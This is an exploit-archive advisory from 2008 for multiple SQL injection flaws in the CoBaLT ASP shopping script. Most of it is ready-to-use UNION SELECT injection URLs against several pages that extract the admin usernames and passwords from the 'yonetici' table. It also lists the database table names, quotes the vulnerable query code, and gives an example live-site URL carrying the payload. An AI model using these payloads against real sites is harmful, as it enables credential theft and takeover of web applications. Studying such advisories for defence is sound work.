[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : CoBaLT 0.1 Multiple Remote SQL Injection Vulnerabilities
# Published : 2008-04-05
# Author : U238
# Previous Title : Easynet Forum Host (forum.php forum) SQL Injection Vulnerability
# Next Title : Gaming Directory 1.0 (cat_id) Remote SQL Injection Vulnerability
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
CoBaLT v1.0 Remote SQL ?°njection Vulnerabiltiy
Discovered : U238
Mail : setuid.noexec0x1@hotmail.com
WebPage : http://ugur238.org (The End)
Script: http://www.aspindir.com/indir.asp?ID=5414
Script (Alternativ) : http://rapidshare.de/files/39031038/cobaltv.1.zip.html
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
Exploit:
http://localhost:2222/lab/cobaltv.1/urun.asp?id=24+union+select+0,1,sifre,3,kadi+from+yonetici
http://localhost:2222/lab/cobaltv.1/admin/bayi_listele.asp?git=duzenle&id=98+union+select+0,1,2,3,sifre,5,kadi,7,8+from+yonetici+where+id=2
----
http://localhost:2222/lab/cobaltv.1/admin/urun_grup_listele.asp?git=duzenle&id=24+union+select+0,kadi+from+yonetici
http://localhost:2222/lab/cobaltv.1/admin/urun_grup_listele.asp?git=duzenle&id=24+union+select+0,sifre+from+yonetici
----
http://localhost:2222/lab/cobaltv.1/admin/urun_listele.asp?id=1+union+select+kadi,sifre,kadi,sifre,sifre+from+yonetici
Admin Panel : localhost/path/admin
Other Table : bayi - sepet - siparis - siparis_urun - urun - urun_grup - yonetici
Dork : Sevmem bole seyler?± , abi anlam?±orum ne bos adamlars?±n?±z :(
Error Code:
id=Request.QueryString("id")
SQL="select * from sepet where id="&"id"
Example Site : http://xxx.org/cobaltv1/urun.asp?id=24+union+select+0,1,sifre,3,kadi+from+yonetici
_-_-_-_-_- NURC?°HAN _-_-_-_-_- BU SEVDA B?°TMEZ _-_-_-_-_- 4 YIL OLDU Amk
Greatz To : The_BekiR _-_ ka0x _-_ Nettoxic _-_ ZeberuS _-_ Str0ke
# www.Syue.com [2008-04-05]